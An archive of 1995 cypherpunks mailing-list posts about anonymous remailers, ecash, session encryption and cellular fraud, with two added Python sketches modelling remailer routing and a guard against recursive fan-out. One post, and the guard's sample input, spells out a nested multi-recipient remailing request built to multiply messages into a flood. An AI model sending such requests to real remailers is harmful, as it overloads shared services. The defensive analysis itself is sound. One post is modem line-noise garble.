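An added sketch of the froth described in the message above (not code from the original post or from any remailer software): one listener's view of the broadcast channel, with adverts expiring after missed broadcasts, padding hops drawn only from trusted keys, and the sender's explicitly named hops honoured even when untrusted. The class and field names, the two-period expiry and the assumption that each advert's signature was already verified are illustrative choices, and the whole path is computed in one place for clarity rather than hop by hop.

```python
import random
from dataclasses import dataclass

T_SECONDS = 600      # broadcast period T; the post suggests about ten minutes
EXPIRY_PERIODS = 2   # assumption: forget a remailer after two silent periods


@dataclass(frozen=True)
class Advert:
    name: str             # human-readable label only; uniqueness is the post's open problem
    address: str
    key_fingerprint: str  # the PGP key is the true identifier
    max_latency_s: int    # advertised maximum latency, carried for routing decisions


class Froth:
    """One listener's view of the remailer broadcast channel."""

    def __init__(self, trusted_fingerprints, rng=None):
        self.trusted = set(trusted_fingerprints)
        self.heard = {}  # fingerprint -> (Advert, time last heard)
        self.rng = rng or random.SystemRandom()

    def hear(self, advert, now):
        # Assumption: the advert's signature was already checked against its key.
        # A re-advertisement under the same key (e.g. a new address) replaces the old one.
        self.heard[advert.key_fingerprint] = (advert, now)

    def active(self, now, include_untrusted=False):
        """Remailers heard within the expiry window, trusted ones only by default."""
        cutoff = now - EXPIRY_PERIODS * T_SECONDS
        live = [ad for ad, last in self.heard.values() if last >= cutoff]
        if not include_untrusted:
            live = [ad for ad in live if ad.key_fingerprint in self.trusted]
        return sorted(live, key=lambda ad: ad.key_fingerprint)

    def route(self, fixed_hops, endpoint, now, max_extra=3):
        """Expand the sender's fixed hops with random padding hops before each step.

        fixed_hops are key fingerprints named by the sender. They count as an
        explicit order, so they only need to be currently advertised, not trusted.
        Padding hops are chosen only from trusted, currently advertised remailers.
        Returns the list of addresses to visit, ending with the endpoint.
        """
        live = {ad.key_fingerprint: ad
                for ad in self.active(now, include_untrusted=True)}
        missing = [fp for fp in fixed_hops if fp not in live]
        if missing:
            # Failing loudly is safer than silently skipping a hop the sender asked for.
            raise LookupError(f"fixed hops not currently advertised: {missing}")

        pool = [ad for ad in self.active(now)
                if ad.key_fingerprint not in fixed_hops]
        path = []
        for step in list(fixed_hops) + [None]:      # None marks the final endpoint
            k = self.rng.randint(0, min(max_extra, len(pool)))
            path.extend(ad.address for ad in self.rng.sample(pool, k))
            path.append(endpoint if step is None else live[step].address)
        return path


if __name__ == "__main__":
    # Constructed sample adverts; addresses and fingerprints are placeholders.
    froth = Froth(trusted_fingerprints={"AA", "BB", "CC"})
    froth.hear(Advert("alpha", "a@example.invalid", "AA", 60), now=0)
    froth.hear(Advert("beta", "b@example.invalid", "BB", 120), now=0)
    froth.hear(Advert("unknown", "x@example.invalid", "XX", 10), now=0)
    froth.hear(Advert("gamma", "c@example.invalid", "CC", 30), now=900)
    print(froth.route(["AA"], "dest@example.invalid", now=1000))
```
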





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 31 Jan 95 12:17:19 PST
To: cypherpunks@toad.com
Subject: Economist Article on Ecash
Message-ID: <199501312016.AA13549@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The article from the Nov. 26, 1995 of The Economist "So much for the
cashless society. (Electronic Money)" is available at:

http://www.ios.com/~lroth/clips/emoney.html

The WWW disabled can apply to Al Gore for a subsidy or send me an emailed
request.

DCF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy6XVYVO4r4sgSPhAQEJTQP/W9VI76LRPHopmk9eT5FPqpjry9L+PSwM
cdbMMCyy4lFWjt+KuS2ca9QCtoxNYT3F7k0RvmI5YwlvbhXYbpiSG999inbZZIv5
vcR3iu5CEGum4yQCW3luWojvlKL8fxsZ6ucnTeAJacxmTlO9uqpg43+2uvzapBBe
q5/YsIGB9Dw=
=jTuA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 31 Jan 95 13:45:15 PST
To: cypherpunks@toad.com
Subject: Economist Article on Ecash
Message-ID: <199501312145.AA06494@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


NO CARRIER



RING



CONNECT 14400



NO CARRIER



RING



CONNECT 9600

 


NO CARRIER



RING



CONNECT 9600

ATH


NO CARRIER



RING



CONNECT 9600



NO CARRIER



RING



CONNECT 14400








NO CARRIER



RING



CONNECT 14400

t}
t}t}t}t}t}












NO CARRIER





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rarachel@prism.poly.edu (Arsen Ray Arachelian)
Date: Tue, 31 Jan 95 13:34:45 PST
To: doumakes@netcom.com (Don Doumakes)
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <199501270505.VAA13738@netcom16.netcom.com>
Message-ID: <9501312119.AA03964@prism.poly.edu>
MIME-Version: 1.0
Content-Type: text


> Internet, nobody knows you're a quack."  I just see it as something to
> endure, rather than something to applaud.

Not quite.  If the societies or guilds in question were to wake up to the
threat, they could easily have whatever institution issued certificates of
passing/degrees/etc. and sign them with their keys.   The licensee would
then attach his e-diploma to his .plan file for anyone to finger and verify
the signature.

So, there, on the internet, being a quack and getting away with it doesn't
have to happen. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 31 Jan 95 17:50:32 PST
To: Al Thompson <alt@iquest.net>
Subject: Re: "bad" government
In-Reply-To: <m0rZNJT-000E68C@dorite.use.com>
Message-ID: <Pine.SUN.3.91.950131173836.26397K-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, Al Thompson wrote:
>  
> If strong government resulted in liberty and freedom, then the
> most intrusive, all-encompassing governments would result in 
> its citizens having the most liberty.  Is this the case?  I would
> look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
> for your answer.
>  
This is an example of reasoning by extremes, which always becomes 
reductio ad absurdum.

Unrestricted individual freedom leads to unrestricted freedom of 
`private' corporations.  Private corporations uncurbed by society's law are 
autarkies: internally totalitarian, externally predatory, as amoral as 
amoebas.

Is this the shape of the future you seek?

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 31 Jan 95 17:53:54 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <9501311911.AA25266@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950131175217.26397L-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, Perry E. Metzger wrote:
> 
> The manufacturers of switching equipment are supposed to make it easy
> to get at individual conversations. Nothing in the act forces
> customers to make the contents of the conversations comprehensible.
> 
That's a loophole in the law that Congress can plug in a day.  And one of 
these days you can bet they will.

What then?

Charles Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Tue, 31 Jan 95 14:54:27 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <9501312257.AA09640@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt, why did you choose to implement your own protocol instead of
adding a DH authentication/encryption type to telnet?

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 31 Jan 95 18:27:47 PST
To: remailer-operators@c2.org
Subject: CD-ROM [brief addition]
Message-ID: <199502010224.SAA24809@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I forgot to mention that the CD-ROM in development will be
export restricted. It isn't going to be sold outside the United States
and Canada.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 31 Jan 95 15:37:57 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <9501312336.AA11049@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


>Matt, why did you choose to implement your own protocol instead of
>adding a DH authentication/encryption type to telnet?
>
>               Marc

I've got one of those, too (it won't be ready for release too soon, 
though - telnet is big and ugly).  An encrypting telnet and telnetd
almost always provide a more appropriate way to do session encryption.
However, there are some situations where ESM is really the only
option.  One is when you can't or don't want to install a daemon
(e.g., for very occasional use).  More importantly, by running within
the session, ESM can provide end-to-end encryption across an untrusted
application-layer firewall (like the one I go through to get
between home and work).

Since part of my motivation for working on these tools comes from 
wanting to use them myself, I'm building the stuff I need the most
first.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Tue, 31 Jan 95 15:46:04 PST
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Economist Article on Ecash
In-Reply-To: <199501312145.AA06494@panix.com>
Message-ID: <199501312345.SAA10848@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> NO CARRIER
> 
> 
> 
> RING
> 
> 
> 
> CONNECT 14400

[ Similar stuff clipped ]

Is this a surreal commentary, or did you have some sort of glitch while
writing the message?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Tue, 31 Jan 95 15:56:02 PST
To: kevin@elvis.wicat.com
Subject: Re: Frothing remailers - an immodest proposal
In-Reply-To: <9501312152.AA10208@toad.com>
Message-ID: <199501312355.SAA11306@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


: From kevin@elvis.wicat.com

Without quoting the entire message, I think a better solution, in terms of
ease to implement as well as conserving bandwidth would be to have a
sophisticated remailer script-language.

For instance, the script language could tell the remailer to check if a
site is on-line (perhaps within certain GMT hours or dates) and use the
next site if not available, or to randomly choose from a list of sites
the active ones, etc.

Maybe even have it work with a data haven? Mail the message to a data haven
and send another message to a remailer chain to pull the message from the
data haven and post the data (note flaws in this: don't want remailers getting
files from people's accounts and posting them to usenet etc.).

Seems like this is a "safer" solution that is more flexible than broadcasting
which remailers are active. Also allows for future add-ons like delays,
file-splitting, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Tue, 31 Jan 95 19:13:11 PST
To: Arsen Ray Arachelian <rarachel@prism.poly.edu>
Subject: Re: cel fraud
In-Reply-To: <Pine.3.05.9501220348.A21277-c100000@prism.poly.edu>
Message-ID: <Pine.A32.3.91c.950131190213.57680H-100000@mead1.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, Arsen Ray Arachelian wrote:

> Oh brother, here we go again.  Now the bandits are not only going to listen in
> for the serial numbers of the phone, but they'll listen in for (what?) touch
> tones of the block out numbers passwords?

The cellular companies' "solution" to this problem for AMPS phones is
laughable.

> If only these guys would wake up and use strong crypto...  This is a perfect
> example of a government caused fucked up on a grand scale due to the fact that
> we now have an installed base of millions of insecure cell phones and cell
> stations.   It's probably not too late for the cell companies to start
> introducing crypto cell phones, but the longer they wait, the harder the switch,
> and what's worse is that they've taken the attitude that "So what if we lose
> millions, we'll just raise the prices and get it all back anyway."

My understanding is CDMA based digital cellular goes a long way toward
this.  CDMA uses direct-sequence spread-spectrum based transmission, 
should keep everyone but the TLA's out.

> You certainly won't find me sporting a cell phone until we get something a bit
> more secure.  :-I  At least the beeper black market isn't as vicious...

Consider getting digital cellular service.  The current widely deployed
digital cellular standard, TDMA, is less secure than CDMA above, but is
more than enough to keep 99% of the cell bandits out.  CDMA should be 
available from USwest and Pacific Telesis (possibly others) by the end 
of the year.

-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@earthlink.net (John L. Tocher)
Date: Tue, 31 Jan 95 19:24:05 PST
To: cypherpunks@toad.com
Subject: Z-Mail by Web
Message-ID: <m0rZVbv-000LFwC@moon.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


>>     Can someone please email me with details about obtaining and 
>>     configuring Z-Mail for use with PGP?
>>     Thanks,
>>     John
>>     
>I would be interested also.  How about cc  this list...
                                        ...  __o
>                                       ..   -\<,
>Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).     

Z-Mail info available at:
ftp://ftp.netcom.com/pub/be/berliner/readme.html 
http://www.kaiwan.com/~mckinnon/readme.html 

I called the company to get a demo key (unlocks the software for a trial
period of 30 days),
and inquired of the price. It's $165 for a single user license... ouch!
I'll check it out, but can anybody suggest alternative windoze/PPP/PGP
interfaces?
John


-
John Tocher                   THE CITY-a bounded infinity.   A labyrinth where
JLTocher@Earthlink.net        you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Tue, 31 Jan 95 20:39:32 PST
To: cypherpunks@toad.com
Subject: Re: DON'T READ!--I'm leaving for Monte Carlo just in time
In-Reply-To: <199501302031.MAA16023@netcom6.netcom.com>
Message-ID: <fVjBlKJXY1hE078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <199501302031.MAA16023@netcom6.netcom.com>,
tcmay@netcom.com (Timothy C. May) wrote:
> Actually, I'm lying. I'm leaving for Monte Carlo in a few hours, to
> give the paper I distributed earlier. (And I'm carrying half a dozen
> DATs, each capable of holding several gigabytes of data, or hundreds
> of megabytes in Stego-LSB mode. And an optical disk cartridge (holding
> only a measly 128 MB). I'll let you know if French customs raises an
> eyebrow upon my entry to Paris--I doubt it--or if the U.S. Federales
> take note of me upon my (attempted?) return to the land of the free.)

Let us know when/where you're returning and will call Customs with
an 'anonymous' tip about a crypto-anarchist returning from a meeting
with the cabal.  Monte Carlo IS the puppet state of a nominally
Socialist government, right?  As James Coburn's character said in
_Hudson Hawk_, "God, I miss the Commies!".

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy7ZAGvyi8p8VUiJAQGg7QQAxWRhk+Ple1UK18CbysKv9OrioxRvMJbb
JPL02KW/3XXVjdcTxg4ze6qsPON9DIK585ArgjlxQ8jPOFH00mAD07vFbo7LU0f8
erLgSb8nhZ9UwOhAFbZ5m5dP4dR99VbVe/jX8rxEyPwGNMf6p51WqsCXW85AP1J7
L9VKWWVY1qA=
=Hl8A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 31 Jan 95 16:39:37 PST
To: Robert Rothenberg <cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
Message-ID: <ab54891b070210044757@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:55 PM 01/31/95, Robert Rothenberg wrote:
>Without quoting the entire message, I think a better solution, in terms of
>ease to implement as well as conserving bandwidth would be to have a
>sophisticated remailer script-language.

Yeah, this is really an excellent idea, that I don't see happening any time
soon. Although of course if anyone wants to write code for such a beast,
that would be really excellent.  If someone gets around to writing it,
it'll happen, but it would be a fairly big project, so I wouldn't hold my
breath.  Safe TCL, anyone?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Tue, 31 Jan 95 20:40:14 PST
To: cypherpunks@toad.com
Subject: Re: Where is the Line Between Public and Private Data?
In-Reply-To: <9501302100.AA05636@TeleCheck.com>
Message-ID: <ubjBlKJXYjuF078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <9501302100.AA05636@TeleCheck.com>,
Joe Turner <turner@telecheck.com> wrote:
> 
> The U.S. Postal Service is selling the NCOA (National Change of Address)
> data to credit card companies.  Some junk-mailing lists are also 
> produced.

Minor point: the NCOA data is only available if you have the previous
address.  Mailers submit a list of name/addresses to an NCOA contractor
(severely limited in what they can do) and if there is a match with the
address supplied by the mailer, the address is updated.  You cannot
just call them up and buy mailing lists.

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy7aP2vyi8p8VUiJAQHcdwQA0nq8oxSuwOGtTxw5McuYv+y8AxWIzRN0
BjRadDR3FOLKSbwRWFkyCy615lgcoDKEAA4POUKrq6s46ugOmQPR4OZTwDR859nR
ifXzzRDM+HhsFbpEtS/HxYou0ZC0BUtAfuzjdVhtAkuk+RSrEcx1udLno1RonVff
2VuaDEuRmNU=
=txUl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Tue, 31 Jan 95 12:14:41 PST
To: cypherpunks@toad.com
Subject: the moderation principle
Message-ID: <199501312014.UAA02292@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain




    From: alt@iquest.net (Al Thompson)

    If strong government resulted in liberty and freedom, then the
    most intrusive, all-encompassing governments would result in
    its citizens having the most liberty.  Is this the case?  I would
    look at the (former) Soviet Union, Iran, Cuba, East Germany, etc.,
    for your answer.


In all things, moderation. If I like salt on my steak, that does not mean
the most salt is the best.

Thinking in fundamentalist extremes severely limits your room for creative
problem solving.

You don't do that when you discuss cyphers -- you don't take rigid sides of
"subway" vs "mixmaster", and paint the other side as fools because their
system would be silly if taken to its extremes. You learn from one another.

Be as creative about political possibilities.



-rkm
                      _____________________
                         Richard K Moore
                         > cyber scribe <
             citizenships:   USA   ;    cyberspace
                    homes: Ireland ; <rkmoore@iol.ie>
                      _____________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 31 Jan 95 20:12:54 PST
To: cypherpunks@toad.com
Subject: Re:  remailers and multiple recipients
Message-ID: <199502010412.UAA19934@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
> Can the remailers handle multiple recipients?  If I list several addresses
> in the "Request-Remailing-To:" line, separated by commas, will the remailer
> do what I would think, and send off to all of them?

We had some concerns here a while back that someone was trying to exploit
such a feature to create an exponentially-growing message that would
totally overload the remailers.  A message of the form:

::
Request-Remailing-To: <list of remailers here>

::
Request-Remailing-To: <list of remailers here>

<repeat about 20 times>

was sent.  If all remailers had observed and honored the multiple
requests, there would have been uncounted trillions of messages flying
about.  So I would caution anyone considering implementing this feature.

Hal
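
Added example, not part of Hal's message and not code from any remailer: a fan-out guard for the nested "::" / Request-Remailing-To form shown above. It counts the messages that would result if every hop honoured every listed address and refuses anything above a limit. The function names, the limits and the example.invalid addresses are assumptions made for the illustration.

```python
# Added illustration (not remailer source). All addresses are constructed.

HEADER = "request-remailing-to"


def parse_layers(body):
    """Return one recipient list per leading '::' header block, in order."""
    lines = body.splitlines()
    layers, i = [], 0
    while i < len(lines):
        while i < len(lines) and not lines[i].strip():
            i += 1                      # blank lines separate the blocks
        if i >= len(lines) or lines[i].strip() != "::":
            break                       # first non-header line: payload starts
        i += 1
        recipients = []
        while i < len(lines) and lines[i].strip():
            name, sep, value = lines[i].partition(":")
            if sep and name.strip().lower() == HEADER:
                recipients += [a.strip() for a in value.split(",") if a.strip()]
            i += 1
        layers.append(recipients)
    return layers


def projected_messages(layers):
    """Messages sent in total if every hop remails to every listed address."""
    total, width = 0, 1
    for recipients in layers:
        width *= len(recipients)        # copies in flight after this layer
        total += width
    return total


def admit(body, max_recipients=1, max_total=100):
    """Decide whether to remail. Returns (accepted, reason).

    The per-layer cap is the check that still works when the inner layers
    are encrypted and invisible to this hop; the projection only helps when
    the nested blocks arrive in the clear, as in the message form above.
    """
    layers = parse_layers(body)
    if not layers or not layers[0]:
        return False, "no remailing request"
    if len(layers[0]) > max_recipients:
        return False, "layer 1 lists %d recipients (limit %d)" % (
            len(layers[0]), max_recipients)
    total = projected_messages(layers)
    if total > max_total:
        return False, "projected %d messages (limit %d)" % (total, max_total)
    return True, "ok"


def header_blocks(count, remailers):
    """Build `count` identical '::' blocks (constructed test input)."""
    block = "::\nRequest-Remailing-To: " + ", ".join(remailers) + "\n\n"
    return block * count


# Constructed sample: 5 placeholder remailers repeated in 20 nested blocks.
REMAILERS = ["rm%d@example.invalid" % n for n in range(1, 6)]
SAMPLE = header_blocks(20, REMAILERS) + "payload text\n"

if __name__ == "__main__":
    print(projected_messages(parse_layers(SAMPLE)))
    print(admit(SAMPLE))
```
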




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 31 Jan 95 20:53:20 PST
To: cypherpunks@toad.com
Subject: Re:  Frothing remailers - an immodest proposal
Message-ID: <199502010434.UAA26114@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have some concerns about Kevin's frothing remailers.  Like so many of
the proposals we see to put more responsibility into the remailer net,
this opens vulnerability to a single bad remailer.  If I trust the first
remailer in the net to choose my path for me, as I might be tempted to
do with a froth, then if that remailer is corrupt my anonymity is lost.
With user-supplied chaining I am secure unless all of the remailers on
the chain are corrupt.

I also do not like the kind of close-knit, cozy cooperation among the
guild of remailer operators which seems to be envisioned in this and
similar proposals.  Do you like the idea of messages on the remailer
operators list saying, I am getting objectionable messages from your
remailer, would you mind dropping in a log so we can see who is sending
these messages which violate the Politically Correct Speech Act?

I do like Kevin's ideas about a dynamic remailer net, but I think
another approach would put more smarts into the client program used by
the originator.  Granted, his information will be somewhat more out of
date as the message makes its way through the network.  But depending
on the time scale at which the froth, um, froths, this should still
allow a lot more dynamism among the set of remailers.  Using either IRC
or, as Todd suggested, Usenet to maintain an active remailer list might
work.  We could also have a distributed set of sites which provide the
information by finger like the pinging sites we have now.

A few notes about Safe-TCL.  I posted some ideas on using this as a basis
for remailing some time back.  Safe-TCL defines three times at which
messages could be activated (scripts in them run).  One is on message
sending, one on message reading (so it can put up dialog boxes and
interact with the recipient in other ways), and the third on receipt,
which is when it enters the user's mailbox.  The actual safe-tcl
implementation does not include support for this third mode, but it would
be pretty easy to add.  If you had that, messages could come to your
machine and activate to do various things that you allow them to do.  If
you allowed them to send mail as one of those things, this would be a
start towards a remailer.

What you need then is some way for various messages to interact with each
other, so that, for example, a message could wait until there were a
certain number of other messages inside the machine before it sent itself
out.  You would also want a way for a message to suspend itself until
some future event, such as having a certain amount of time passing, or
waiting until some message with desired properties arrived.

There has been intermittent discussion of similar topics on the safe-tcl
mailing list.  The motivation there is not supplying remailers, of
course; rather there is a desire to have something with similar
functionality to the much-ballyhooed Telescript, but less bound by
proprietary constraints.  Telescript scripts can move through the network
and interact with other scripts (at least, they will supposedly be able
to, but the exact manner is apparently secret for now).  Providing the
simple act of motion to mail agent scripts without stamping them with a
record of everywhere they have been is really all a remailer would do.
(I wonder if Telescript agents have to carry around with them a record of
every path they've taken?)

Sending a message through a safe-tcl based remail network might be more
cumbersome than our current techniques.  You might have to precede the
message body with a safe-tcl program a few lines to a couple of pages in
size depending on the complexity of remailing you want.  But again with
proper clients this can be hidden from the user.  I think emphasis should
be on smart mailer clients rather than more cooperation among nodes in
the remailer network.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLy8O8hnMLJtOy9MBAQHMjwIA40ZIvNtOvMN/mWtY4bSN0MYMravR9bNr
zhZ519K+g6w5ZsW71c/kM7BFz15BjB9pIcTMjUQv/C8YJNGrdFEzhg==
=1okU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 31 Jan 95 18:07:20 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: AT&T and VLSI Encryption device
In-Reply-To: <Pine.SUN.3.91.950131175217.26397L-100000@eskimo.com>
Message-ID: <9502010206.AA25940@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Charles Bell says:
> On Tue, 31 Jan 1995, Perry E. Metzger wrote:
> > The manufacturers of switching equipment are supposed to make it easy
> > to get at individual conversations. Nothing in the act forces
> > customers to make the contents of the conversations comprehensible.
>
> That's a loophole in the law that Congress can plug in a day.  And one of 
> these days you can bet they will.
> 
> What then?

Then the law will be different. The question was one of what the law
is now.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 31 Jan 95 21:21:38 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers - an immodest proposal
In-Reply-To: <199502010253.VAA03904@bb.hks.net>
Message-ID: <199502010520.VAA04884@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   In article <9501312152.AA10208@toad.com>,  <kevin@elvis.wicat.com> wrote:
   >It seems to me that the current remailer web suffers a fundamental flaw.
   >It is simply too static.

It is worthwhile remembering that a remailer network has two
characteristics of service: the fact of delivery, and silence in the
internal facts of that delivery.  That is, you want your email to get
there, but you don't want anybody else to know how it got there.
There are correspondingly two trusts in the function of a remailer,
namely, a trust in reliability, and a trust in silence.

It is very important to remember that only one of these is externally
verifiable.  Your mail gets to its final location; you can tell that.
What you can't tell (external to the remailer) is whether the remailer
kept a copy of the mapping between input and output messages.

Now, dynamic rerouting is good for better delivery, but is bad for the
trust in silence.  Trust in externally unverifiable properties is
_not_ transferrable.  Just because I believe that my regular remailer
is OK does not mean you do.  The creation of these links of trust is
not something that can be automated solely by the remailer operators.
The end users of the remailers are the endpoints of this trust
relationship.  The end users must be involved, either directly or
through some (legal) agent, in the manipulation of these relationships.

Any solution which tries to do this independent of the end user is
broken, by definition.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 31 Jan 95 21:29:07 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301802.AA08512@merckx.info.att.com>
Message-ID: <199502010527.VAA04897@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Matt Blaze <mab@research.att.com>

   [this = storing secrets]
   At the extreme, fixing this is a Hard Problem.  In practice for establishing
   a reasonably secure session, it all depends on how much you worry about a
   full-blown (two way) spoofing attack against IP.

I know Matt realizes, but let me repeat for the rest of the list.

Just because plain old Diffie Hellman is subject to active attack
doesn't mean it's useless.  Some protection is better than no
protection at all.  It's still worthwhile implementing some security
to make an opponent's task harder than to implement no security.

And just because some people find this level of security inadequate
does not mean that everyone else does.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <remail@desert.xs4all.nl>
Date: Wed, 1 Feb 95 19:08:30 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199502020308.AA13869@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


##
Subject: Re: Frothing remailers - an immodest proposal
In-reply-to: <199502010520.VAA04884@largo.remailer.net> (eric@remailer.net)

> Date: Tue, 31 Jan 1995 21:20:28 -0800
> From: eric@remailer.net (Eric Hughes)
> 
>    In article <9501312152.AA10208@toad.com>,  <kevin@elvis.wicat.com> wrote:
>    >It seems to me that the current remailer web suffers a fundamental flaw.
>    >It is simply too static.
> 
> Now, dynamic rerouting is good for better delivery, but is bad for the
> trust in silence. [...] The end users must be involved, either directly or
> through some (legal) agent, in the manipulation of these relationships.
> 
> Any solution which tries to do this independent of the end user is
> broken, by definition.
> 
> Eric

  Well, pgp supports multiple recipients of messages.  Suppose that the
remailers would choose at random only one of the addresses the user
(or their client program) requested in a header line like:

Request-ND-Remailing-To: RM1@a.b.c, RM2@c.d.e, RM3@e.f.g

and try to deliver.  If the mail fails right away, then it tries
another address.  Etc.

  The very paranoid user would avoid this feature, and stick with the
old fashioned system.  The paranoid would list two remailers, and
encrypt the following message to both of them, and probably add a few
more levels to the chain, just to be sure.  The completely trusting
would only have two levels of remailing, but which listed every
remailer as a possible recipient of the message they send to the first
in the chain.

  In this way we get better reliability, but still have user control
over selecting the remailers.  In fact, the user can select arbitrary
message reliability, and remailer trust parameters, and should be able
to come up with a set of nd-hops to meet the parameters.

  Hey Wei, Hal: What is the cost of this in terms of likelihood that
the whole path of remailers actually selected is compromised?  Is this
about right?  If 50% of the remailers are run by the enemy, then with
only one remailer listed in each hop, the odds of the path being
compromised is (.5)^h (where h is number of hops).  The odds of
successful delivery are .90^h (assuming every remailer is 90% up).  If
at each step there were two remailers, and the evil remailers always
selected other co-operating evil remailers, then the odds of the path
being compromised is larger at ((1-.5^2)==.75)^(h).  But the odds of
successful delivery are much better, (1-((1-.90)^2)==.99)^(h).  To
keep the same chance of the path being compromised, the user would
need to have 'x' times more hops where x is such that (.75)^x == .5,
or about 2.4 times as many.

  Hmmm...

  Noyb
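
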